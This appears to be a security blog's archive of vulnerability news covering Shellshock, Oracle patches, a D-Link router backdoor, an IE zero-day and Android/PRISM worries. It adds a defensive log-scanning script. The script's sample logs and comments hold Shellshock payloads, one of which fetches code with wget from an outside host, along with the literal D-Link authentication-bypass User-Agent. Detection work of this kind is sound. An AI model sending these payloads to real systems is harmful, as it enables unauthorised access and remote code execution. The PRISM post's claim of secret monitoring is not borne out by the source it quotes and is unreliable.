Category Archives: Vulnerability News


#Shellshock bug – critical vulnerability in the Bash Unix command-line interpreter

Shellshock, also called Bashdoor, is a security bug in the Unix Bash shell. It is a critical flaw that was discovered by Unix specialist Stéphane Chazelas and publicly disclosed on 24 September 2014. “Many Internet daemons, such as web servers, use Bash to process certain commands, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system” (Wikipedia, 2014). The root cause is that Bash imported function definitions from environment variables and kept parsing past the end of the definition, so any commands appended after the closing brace were executed as soon as the shell started. For an attack to succeed, the targeted system must have a script or application that invokes Bash with environment variables an attacker controls; CGI scripts are the classic case, because the web server copies request headers such as User-Agent into the environment of the script it runs.

Common Vulnerabilities and Exposures database (CVE)

The flaw was originally assigned CVE-2014-6271, but it was later discovered that the initial patch left an issue in the parser and did not fully address the problem. CVE-2014-7169, CVE-2014-6277, CVE-2014-6278, CVE-2014-7186 and CVE-2014-7187 were subsequently assigned to cover the remaining problems found after the first patch had been applied (Wikipedia, 2014).

CVSS Severity (version 2.0):

CVSS v2 Base Score: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)

Impact Subscore: 10.0

Exploitability Subscore: 10.0

CVSS Version 2 Metrics:

Access Vector: Network exploitable

Access Complexity: Low

Authentication: Not required to exploit


Oracle Critical Patch Updates for April 2014

Oracle has released its April 2014 Critical Patch Update, addressing serious flaws that have been identified across its product lines. “Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory” (Oracle, 2014). This update contains 104 new security fixes, covering Oracle Database, Fusion Middleware, Hyperion, the Supply Chain Products Suite, Siebel CRM, PeopleSoft Enterprise, iLearning, Java SE, the Sun Systems Products Suite, Oracle Linux and Virtualization, and MySQL (summarised in table 1 below). Because several of these vulnerabilities are remotely exploitable, Oracle recommends applying the patches as soon as possible.

“Among the patches that should be prioritized are two bugs in Oracle’s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there” (Threatpost, 2014). The update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. The full list of fixes is on Oracle's site.

Oracle Critical Updates

Oracle has released its Critical Patch Update for October 2013 to address 127 vulnerabilities across multiple products.
It includes 51 Java SE vulnerabilities; 21 of these have a CVSS score of at least 9, and 12 have a CVSS score of 10.0, the maximum, which means an attacker could use them to compromise a system remotely without any authentication.
Qualys CTO Wolfgang Kandek notes that many of the 76 other vulnerabilities addressed in Oracle's other products also allow remote, unauthenticated access for an attacker. IT admins should therefore apply these patches promptly, prioritising systems that host applications reachable from the internet.
This update contains the following security fixes:
• 6 for Oracle Industry Applications
• 1 for Oracle Financial Services Software
• 2 for Oracle Supply Chain Products Suite
• 8 for Oracle PeopleSoft Products
• 9 for Oracle Siebel CRM
• 2 for Oracle Primavera Products Suite
• 17 for Oracle Fusion Middleware
• 4 for Oracle Enterprise Manager Grid Control
• 1 for Oracle E-Business Suite
• 51 for Oracle Java SE
• 12 for Oracle and Sun Systems Products Suite
• 2 for Oracle Virtualization
• 8 for Oracle MySQL
• 2 for Oracle Database
• 2 for Oracle iLearning
These counts add up to the 127 fixes in the update.
Visit the Oracle website for a more in-depth analysis.

Alert: A backdoor found in many D-Link devices allows authentication to be bypassed

Are you using a D-Link wireless router? You need to watch out if your device is one of the following, or another member of the D-Link family (more information will become available as further tests are performed on affected devices):

  1. DIR-100
  2. DIR-120
  3. DI-624S
  4. DI-524UP
  5. DI-604S
  6. DI-604UP
  7. DI-604+
  8. TM-G5240

The backdoor allows an attacker to reach the administration web interface of the device without any authentication and to view or change its settings. It was found in firmware v1.13: a request that carries a specific User-Agent string is accepted by the device's web server without the password check, so no credentials are needed at all. Unless remote management has been enabled, the interface is reachable only from the local network, which limits the exposure but does not remove it, since any compromised or malicious host on the LAN can use it. For the full analysis see the article “Reverse Engineering a D-Link Backdoor” at http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/.

How to mitigate the vulnerability

The company also offered this advice: “As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.” (http://www.dlink.com)

Also ensure that:

  1. Unsolicited emails: do not open unsolicited emails from unknown people or organisations; clicking a URL in them could let an unauthorised user reach your router's administration page.
  2. Your wireless network is secure: enable encrypted communication (WPA2 with AES is the clear choice for best security).
  3. Remote access (remote management) on your router is disabled (it is disabled by default).
  4. You download the firmware install guide provided within the firmware ZIP package and update the firmware as soon as D-Link officially releases the patch (visit http://www.dlink.com/uk/en/support/security for official D-Link updates).
  5. Lastly, strong passwords are set for access to the administration interfaces. Note that a strong password does not protect against this particular backdoor, which bypasses authentication entirely; it only limits other attacks until the firmware has been updated.

The flaw is serious because any attacker with basic technical know-how can exploit it. I would recommend checking the model and hardware revision of the D-Link devices in use to determine whether they are affected, monitoring the traffic to these devices closely, and upgrading the firmware as soon as D-Link releases the update.
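As an added example, not taken from the original posts or from the cited write-ups, the following Python script scans web-server access logs for the two indicators discussed on this page: the "() {" function-definition prefix that Shellshock (CVE-2014-6271 and its follow-ups, covered in the first post above) relies on, and the D-Link backdoor User-Agent string documented in the devttys0 article linked in this post. The combined log format, the sample lines and the IP addresses are constructed for the demonstration; the bash one-liner in the comment is the widely circulated local Shellshock test and is not run by the script.

```python
import re
from urllib.parse import unquote

# Combined (Apache/nginx) log format: the request line is the first quoted
# field, the referer the second and the User-Agent the last.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Shellshock: a vulnerable bash treats any environment variable whose value
# starts with "() {" as an exported function and runs whatever follows the
# closing brace. The classic local test sets exactly such a variable:
#   env x='() { :;}; echo vulnerable' bash -c "echo test"
# Every payload, including the CVE-2014-7169 variant "() { (a)=>\", starts
# with "() {", so that prefix is what we look for (whitespace-tolerant).
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# D-Link backdoor: the firmware's web server skips the password check when
# the request carries this exact User-Agent (value from the devttys0
# write-up linked above).
DLINK_BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"


def classify(line):
    """Return (client_ip, [reasons]) for a parsable line, None otherwise."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode %XX escapes first: a payload hidden in a query string arrives
    # percent-encoded, but the CGI gateway decodes it before bash sees it.
    f = {k: unquote(v) for k, v in m.groupdict().items()}
    reasons = []
    for field in ("req", "referer", "ua"):
        if SHELLSHOCK_RE.search(f[field]):
            reasons.append(f"shellshock payload in {field}")
    if f["ua"].strip() == DLINK_BACKDOOR_UA:
        reasons.append("d-link backdoor user-agent")
    return f["ip"], reasons


def scan(lines):
    """Return [(line_number, client_ip, reasons)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result is not None and result[1]:
            hits.append((n, result[0], result[1]))
    return hits


# Constructed sample log lines (not real traffic); addresses are taken from
# the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:22 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \'wget http://203.0.113.9/x\'"',
    '198.51.100.7 - - [25/Sep/2014:10:01:23 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)"',
    '198.51.100.23 - - [25/Sep/2014:10:02:05 +0000] '
    '"GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 500 0 "-" "curl/7.37.0"',
    '192.0.2.44 - - [13/Oct/2013:08:15:00 +0000] "GET / HTTP/1.1" 200 2048 "-" '
    '"xmlset_roodkcableoj28840ybtide"',
    '203.0.113.77 - - [25/Sep/2014:10:03:41 +0000] "GET / HTTP/1.0" 200 300 '
    '"() { (a)=>\\\' /bin/bash -c \'uname -a\'" "Wget/1.15"',
]

if __name__ == "__main__":
    for n, ip, reasons in scan(SAMPLE_LOG):
        print(f"line {n}: {ip}: {', '.join(reasons)}")
```

The request line, referer and User-Agent are all checked because a CGI gateway exports each of them into the script's environment (REQUEST_URI, HTTP_REFERER, HTTP_USER_AGENT), so any of them is a valid delivery path for Shellshock; the percent-decoding step matters because a payload in a query string is logged encoded but reaches bash decoded. The D-Link match is an exact comparison on the User-Agent, since the backdoor triggers only on that literal value.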

Emergency Microsoft Security Advisory (2887505) – Vulnerability in Internet Explorer Could Allow Remote Code Execution

Microsoft has released an emergency advisory, ‘Vulnerability in Internet Explorer Could Allow Remote Code Execution’, after investigating public reports of a zero-day vulnerability that attackers were actively exploiting in IE versions 8 and 9 on Windows XP and Windows 7. The vulnerability affects “all supported versions of its browser (IE6, IE7, IE8, IE9, IE10, and IE11)” (Emil Protalinski, 2013).

A zero-day vulnerability is a flaw that is unknown to the vendor, or known but not yet patched, at the time it is first exploited; the corresponding zero-day attack takes place on ‘day zero’ of the vendor's response, meaning the developers have had zero days to address and patch the vulnerability.

The company has found that the flaw could potentially affect all supported versions, although it says that running “modern versions” of IE has the advantage of additional security features that can help prevent successful attacks. The flaw makes remote code execution possible if you browse to a website containing content crafted for your specific browser version; an attacker can either compromise a regularly visited and trusted site or convince the user to click a link in another application, such as an email message.

Securing virtual servers

Every organisation is moving to virtualisation, mainly to cut costs and to make maximum use of hardware resources. Virtualisation has revolutionised the data centre and is one of the key foundational technologies underlying cloud computing. This has led several companies to rush into deploying virtualisation solutions in both their private and public clouds without taking the risks into account, yet the technology has its own inherent vulnerabilities: a compromise of the hypervisor or its management layer exposes every guest it hosts, and guests sharing a host can no longer be assumed to be isolated from one another.

“THE BIG BROTHER”: PRISM AND HOW IT IS BEING PROPAGATED IN ANDROID-BASED DEVICES

Information security, cyber security and system audit enthusiasts have been preoccupied with Chinese hackers, Anonymous and other hacking groups. Was this a diversionary tactic by Big Brother? He has been busy developing legislation to tighten cyber security, some of which runs against the constitutional right to privacy. Was it a conspiracy? Now we are caught off guard when the reality of PRISM, which is used to harvest data for security purposes, hits us.

Many of us have heard of the new OS on the block, growing daily and bringing new companies and a new internet experience: Android. Android is a free, open-source OS developed by Google and used in myriad devices such as smartphones, tablets, cameras, etc.

The scary part is that while you are having a good time with your family, friends, lovers and business associates, the devices are secretly monitoring you and sending the information to Big Brother. Scary! Are you scared? That is only the tip of the iceberg; you thought nobody was watching. This has been confirmed publicly: “Through its open-source Android project, Google has agreed to incorporate code, first developed by the agency in 2011, into future versions of its mobile operating system, which according to market researcher IDC runs on three-quarters of the smartphones shipped globally in the first quarter. NSA officials say their code, known as Security Enhancements for Android, isolates apps to prevent hackers and marketers from gaining access to personal or corporate data stored on a device. Eventually all new phones, tablets, televisions, cars, and other devices that rely on Android will include NSA code, agency spokeswoman Vanee’ Vines said in an e-mailed statement. NSA researcher Stephen Smalley, who works on the program, says, “Our goal is to raise the bar in the security of commodity mobile devices.”

“Vines wouldn’t say whether the agency’s work on Android and other software is part of or helps with Prism. “The source code is publicly available for anyone to use, and that includes the ability to review the code line by line,” she said in her statement. Most of the NSA’s suggested additions to the operating system can already be found buried in Google’s latest release—on newer devices including Sony’s Xperia Z, HTC’s One, and Samsung Electronics’ Galaxy S4. Although the features are not turned on by default, according to agency documentation, future versions will be. In May the Pentagon approved the use of smartphones and tablets that run Samsung’s mobile enterprise software, Knox, which also includes NSA programming, the company wrote in a June white paper. Sony, HTC, and Samsung declined to comment.”

When you are taking a photo of your family or making a business deal, beware: Big Brother is watching you!